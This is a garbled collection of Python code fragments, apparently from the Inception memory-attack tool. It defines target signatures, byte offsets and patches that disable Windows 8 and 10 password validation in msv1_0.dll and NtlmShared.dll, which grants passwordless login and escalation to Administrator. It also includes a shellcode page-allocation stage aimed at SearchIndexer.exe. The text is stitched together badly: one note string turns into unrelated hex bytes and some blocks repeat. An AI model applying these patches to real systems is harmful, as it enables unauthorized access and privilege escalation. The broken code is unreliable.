# )
# ]
# )
targets = [
Target(
name='Windows 10 MsvpPasswordValidate unlock/privilege escalation',
note='Ensures that the password-check always returns true. This will '
'cause all accounts to no longer require a password, and will '
'also allow you to escalate privileges to Administrator via the '
'\'runas\' command.',
signatures=[
Signature(os='Windows 10',
os_versions=['10.0'],
os_architectures=['x64'],
executable='NtlmShared.dll',
version=None,
md5=None,
tag=False,
offsets=[0x14f],
chunks=[
Chunk(chunk=0xc60f84,
chunkoffset=0x00,
patch=0xb001,
patchoffset=0x07)
])
]),
Target(
name='Windows 8 MsvpPasswordValidate unlock/privilege escalation',
note='Ensures that the password-check always returns true. This will '
'cause all accounts to no longer require a password, and will '
'also allow you to escalate privileges to Administrator via the '
b'\x4e\x44\x4f\x57\x53\x5c\x73\x79\x73\x74\x65\x6d\x33\x32' +
b'\x5c\x53\x65\x61\x72\x63\x68\x49\x6e\x64\x65\x78\x65\x72' +
b'\x2e\x65\x78\x65\x7c\x53\x76\x63\x3d\x57\x53\x65\x61\x72' +
b'\x63\x68\x7c\x4e\x61\x6d\x65\x3d\x53\x65\x61\x72\x63\x68' +
b'\x49\x6e\x64\x65\x78\x65\x72\x2d\x32\x7c\x22\x22\x00'
}
stage1 = Target(name='Allocate page',
note='Create page, copy signature to it and jump to page',
signatures=[
Signature(offsets=[0x18c],
chunks=[
Chunk(chunk=0x8bff558bec813D,
chunkoffset=0,
patch=shellcode['alloc_page'],
patchoffset=0)
],
os='Windows 7',
os_versions=['SP1'],
os_architectures=['x86'],
executable='SearchIndexer.exe',
version='',
md5='',
tag=False)
])
def add_options(group):
group.add_option('--msfopts',
dest='msfopts',
help='exploit options in a comma-separated list using '
'the format \'OPTION=value\'')
from _pyio import StringIO
from inception import memory
from inception.interfaces import file as interface
from inception.memory import Target, Signature, Chunk
# Target template
targets = [
Target(name='find',
note=None,
signatures=[
Signature(os=None,
os_versions=[],
os_architectures=['x86', 'x64'],
executable=None,
version=None,
md5=None,
tag=False,
offsets=[0x2a0],
chunks=[
Chunk(chunk=0x9782440e1b5939ff,
chunkoffset=0x00,
patch=0x00,
patchoffset=0x00)
])
]),
Target(name='findall',
note=None,
signatures=[
Signature(os=None,
os_versions=[],
os_architectures=['x86', 'x64'],
executable=None,
Target(
name='Windows 8 MsvpPasswordValidate unlock/privilege escalation',
note='Ensures that the password-check always returns true. This will '
'cause all accounts to no longer require a password, and will '
'also allow you to escalate privileges to Administrator via the '
'\'runas\' command.',
signatures=[
Signature(
os='Windows 8',
os_versions=['8.0'],
os_architectures=['x86'],
executable='msv1_0.dll',
version=None,
md5=None,
tag=False,
offsets=[0xde7],
chunks=[
Chunk(
chunk=0x8bff558bec81ec90000000a1,
chunkoffset=0x00,
patch=0xb001,
patchoffset=0xc1)
]
),
Signature(
os='Windows 8',
os_versions=['8.1'],
os_architectures=['x86'],
executable='msv1_0.dll',
version=None,
md5=None,
tag=False,
offsets=[0xca0],
chunks=[
Chunk(
chunk=0x8bff558bec81ec90000000a1,
chunkoffset=0x00,
patch=0x909090909090,
patchoffset=0xb3)
]
),
Signature(
os='Windows 8',
os_versions=['8.0', '8.1'],
os_architectures=['x64'],
executable='msv1_0.dll',
version=None,
md5=None,
tag=False,
offsets=[0x208, 0xd78],
chunks=[
Chunk(
chunk=0xc60f85,
chunkoffset=0x00,
patch=0x909090909090,
patchoffset=0x01),
Chunk(
chunk=0x66b80100,
chunkoffset=0x07,
patch=None,
patchoffset=0x00)
]
)
]
),